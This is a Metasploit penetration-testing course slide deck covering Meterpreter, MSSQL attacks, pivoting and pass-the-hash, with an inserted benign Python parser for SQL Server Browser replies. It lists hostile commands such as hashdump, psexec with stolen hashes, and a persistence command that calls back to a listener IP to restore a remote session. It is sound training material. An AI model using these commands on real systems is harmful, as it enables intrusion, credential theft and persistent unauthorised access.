Pentesting With Metasploit
Metasploit
Georgia Weidman
Acknowledgements
Metasploit Team
Offensive Security/Metasploit Unleashed
Hackers for Charity
David Kennedy
BSides Delaware Crew
Darren
Agenda
Metasploit Basics
Some terminology/brief intro to pentesting
How Metasploit works
Interacting with Metasploit
Basic Exploitation
Exploiting a vulnerability using Metasploit console
Using Meterpreter
Using the Meterpreter shell for post exploitation
Agenda
Metasploit in a penetration test
Information Gathering
Vulnerability Scanning
Exploitation in depth
Post exploitation
Reporting
Connecting
Wireless access point SSID IgnatiusRiley
Password: metasploit
What is Metasploit?
Exploitation framework
Ruby based
Modular
Exploits, payloads, auxiliaries, and more
Metasploit Terminology
Exploit: vector for penetrating the system
Payload: shellcode, what you want the exploit to do
Encoders: encode or mangle payload
Auxiliary: other modules besides exploitation
Session: connection from a successful exploit
Metasploit Interfaces
Msfconsole
Msfcli
Msfweb, Msfgui (discontinued)
Metasploit Pro, Metasploit Express
Armitage
Exploitation Streamlining
Traditional Pentest:
Find public exploit
Change offsets and return address for your target
Replace shellcode
Metasploit:
Load Metasploit module
Select target OS
Set IP addresses
Select payload
Sessions
sessions -l lists all active sessions
sessions -i <id> interacts with a given session
Meterpreter
Gain a session using a meterpreter payload
Memory based/never hits the disk
Everything a shell can do plus extra
Meterpreter Commands
help shows all available commands
background backgrounds the session
ps shows all processes
migrate <process id> moves meterpreter to another process
getuid shows the user
Meterpreter Commands
download <file> pulls a file from the victim
upload <file on attacker> <file on victim> pushes a file to the victim
hashdump dumps the password hashes from the SAM
shell drops you into a command shell
Exercise
Information Gathering
Learning as much about a target as possible
Examples: open ports, running services, installed software
Identify points for further exploration
Portscanning
Queries a host to see if a program is listening on a port
Ex: browsing to a website: the web server listens on port 80
Listening ports are reachable by an attacker and, if the service is vulnerable, may be used for exploitation
Ex: ms08_067_netapi exploits SMB on port 445
Vulnerability Scanning
Query systems for potential vulnerabilities
Identify potential methods of penetration
Ex: SMB version scan in information gathering returned port 445 open and target Windows XP SP2, so scan for the ms08_067_netapi vulnerability
Our Database
hosts
services
vulns
-c select columns
-s search for specific string
db_autopwn
By default just runs all the exploits that match a given open port
Not stealthy
Using vulnerability data it can be made smarter: matches on vulnerabilities instead of ports
db_autopwn -x -e
Attacking MSSQL
MSSQL TCP port can change, UDP port is 1434
msf> search mssql (shows all mssql modules)
msf> use scanner/mssql/mssql_ping (queries UDP 1434 for information including the TCP port)
msf> use scanner/mssql/mssql_login (tries passwords to log into mssql)
msf> use windows/mssql/mssql_payload (logs into mssql and gets a shell)
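As an added example (not from these slides or the Metasploit project), a parser for the SQL Server Browser (SSRP) reply that mssql_ping reads from UDP 1434; the sample datagram and host names are constructed. It shows why the MSSQL TCP port "can change" yet is still discoverable, which is the same data a defender can use to inventory exposed instances.

```python
import struct

# Constructed sample of an SQL Server Browser (SSRP) SVR_RESP datagram.
# Layout: one byte 0x05, little-endian 16-bit body length, then ASCII
# key;value pairs, each instance record terminated by ";;".
SAMPLE_BODY = (
    b"ServerName;WINXP-LAB;InstanceName;MSSQLSERVER;IsClustered;No;"
    b"Version;9.00.1399.06;tcp;1433;;"
    b"ServerName;WINXP-LAB;InstanceName;SQLEXPRESS;IsClustered;No;"
    b"Version;9.00.1399.06;tcp;50213;"
    b"np;\\\\WINXP-LAB\\pipe\\MSSQL$SQLEXPRESS\\sql\\query;;"
)
SAMPLE_RESPONSE = b"\x05" + struct.pack("<H", len(SAMPLE_BODY)) + SAMPLE_BODY


def parse_ssrp_response(datagram: bytes) -> list[dict]:
    """Return one dict per advertised instance, e.g. {'InstanceName': 'SQLEXPRESS', 'tcp': 50213}."""
    if len(datagram) < 3 or datagram[0] != 0x05:
        raise ValueError("not an SSRP SVR_RESP datagram")
    (length,) = struct.unpack_from("<H", datagram, 1)
    body = datagram[3:3 + length].decode("ascii", errors="replace")
    instances = []
    for record in body.split(";;"):
        if not record:
            continue  # trailing empty piece after the final ";;"
        fields = record.split(";")
        # keys sit at even indexes, values at odd indexes
        info = {fields[i]: fields[i + 1] for i in range(0, len(fields) - 1, 2)}
        if "tcp" in info:
            info["tcp"] = int(info["tcp"])  # the dynamic TCP listener port
        instances.append(info)
    return instances


def exposed_tcp_ports(datagram: bytes) -> list[int]:
    """Sorted list of TCP ports the browser service advertises (inventory view)."""
    return sorted(i["tcp"] for i in parse_ssrp_response(datagram) if "tcp" in i)


if __name__ == "__main__":
    for inst in parse_ssrp_response(SAMPLE_RESPONSE):
        print(inst.get("InstanceName"), inst.get("tcp"))
    print("advertised TCP ports:", exposed_tcp_ports(SAMPLE_RESPONSE))
```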
Meterpreter: Migrating
If the process that hosts meterpreter closes, meterpreter dies too
Example: client side exploit residing in the browser
meterpreter> ps (shows all processes)
meterpreter> migrate <process id> (moves to a new process)
Pivoting
Scenario: Exploit a dual networked host, with a routable interface and a non-routable one. Can we attack other hosts on the non-routable interface without SSH tunneling?
route add 10.0.0.0/24 1 (routes traffic to the subnet through session 1)
Now you can portscan, exploit, etc. the non-routable subnet
PSExec
hashdump (dumps the hashes, not always easy to crack)
Why not just pass the hash to other systems?
use windows/smb/psexec
set SMBPass to the hash
Meterpreter: Persistence
Persistence script installs a meterpreter service
Meterpreter comes back when the box restarts
Ex: run persistence -U -i 5 -p 443 -r 192.168.20.101 (respawns on login, at a 5 second interval, connecting to port 443 on IP 192.168.20.101)
Exercises
Perform a penetration test on the Windows and Linux systems we used in class
Perform a penetration test on the lab network
Contact
Georgia Weidman
Website: http://www.grmn00bs.com
http://www.georgiaweidman.com
Email: georgia@grmn00bs.com
Twitter: @vincentkadmon